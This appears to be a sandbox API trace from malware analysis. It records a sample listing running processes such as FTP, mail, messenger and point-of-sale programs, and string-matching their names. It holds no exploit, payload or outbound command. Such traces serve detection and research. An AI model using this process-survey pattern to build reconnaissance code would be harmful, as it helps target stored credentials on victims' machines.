(in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0100.219] StrStrIA (lpFirst="far.exe", lpSrch="visio") returned 0x0 [0100.219] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.220] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b130 [0100.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x357b130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0100.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0100.220] StrStrIA (lpFirst="filezilla.exe", lpSrch="visio") returned 0x0 [0100.220] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.230] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b2f8 [0100.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x357b2f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0100.231] StrStrIA (lpFirst="flashfxp.exe", lpSrch="visio") returned 0x0 [0100.231] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.232] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b340 [0100.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x357b340, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0100.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0100.232] StrStrIA (lpFirst="fling.exe", lpSrch="visio") returned 0x0 [0100.232] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.233] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357e028 [0100.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357e028, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0100.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0100.233] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="visio") returned 0x0 [0100.233] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.234] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357df08 [0100.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357df08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0100.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0100.234] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="visio") returned 0x0 [0100.234] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.235] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574ed0 [0100.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574ed0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0100.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0100.235] StrStrIA (lpFirst="icq.exe", lpSrch="visio") returned 0x0 [0100.235] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.236] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b190 [0100.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b190, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0100.236] StrStrIA (lpFirst="leechftp.exe", lpSrch="visio") returned 0x0 [0100.236] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.237] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b1c0 [0100.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b1c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.237] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0100.237] StrStrIA (lpFirst="ncftp.exe", lpSrch="visio") returned 0x0 [0100.237] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.238] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b388 [0100.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x357b388, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0100.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0100.238] StrStrIA (lpFirst="notepad.exe", lpSrch="visio") returned 0x0 [0100.238] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.240] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b0b8 [0100.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x357b0b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0100.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0100.240] StrStrIA (lpFirst="operamail.exe", lpSrch="visio") returned 0x0 [0100.240] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.241] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b370 [0100.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x357b370, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0100.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0100.241] StrStrIA (lpFirst="pidgin.exe", lpSrch="visio") returned 0x0 [0100.241] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.242] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b148 [0100.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b148, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0100.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0100.242] StrStrIA (lpFirst="scriptftp.exe", lpSrch="visio") returned 0x0 [0100.242] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.243] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b3a0 [0100.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x357b3a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0100.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0100.243] StrStrIA (lpFirst="skype.exe", lpSrch="visio") returned 0x0 [0100.243] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.244] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b178 [0100.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b178, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.244] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0100.244] StrStrIA (lpFirst="smartftp.exe", lpSrch="visio") returned 0x0 [0100.244] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0100.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.245] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357b1f0 [0100.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x357b1f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0100.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0100.245] StrStrIA (lpFirst="thunderbird.exe", lpSrch="visio") returned 0x0 [0100.245] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.246] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b358 [0100.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x357b358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0100.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0100.246] StrStrIA (lpFirst="totalcmd.exe", lpSrch="visio") returned 0x0 [0100.246] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.248] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b1a8 [0100.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x357b1a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0100.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0100.248] StrStrIA (lpFirst="trillian.exe", lpSrch="visio") returned 0x0 [0100.248] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.249] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b238 [0100.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x357b238, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0100.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0100.249] StrStrIA (lpFirst="webdrive.exe", lpSrch="visio") returned 0x0 [0100.249] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.250] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b0d0 [0100.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x357b0d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0100.250] StrStrIA (lpFirst="whatsapp.exe", lpSrch="visio") returned 0x0 [0100.250] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0100.251] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357b0e8 [0100.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x357b0e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0100.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0100.251] StrStrIA (lpFirst="winscp.exe", lpSrch="visio") returned 0x0 [0100.251] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.253] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357e008 [0100.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357e008, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0100.253] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0100.253] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="visio") returned 0x0 [0100.253] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.254] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357de48 [0100.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357de48, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0100.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0100.254] StrStrIA (lpFirst="active-charge.exe", lpSrch="visio") returned 0x0 [0100.254] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.255] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b100 [0100.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x357b100, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0100.255] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0100.256] StrStrIA (lpFirst="accupos.exe", lpSrch="visio") returned 0x0 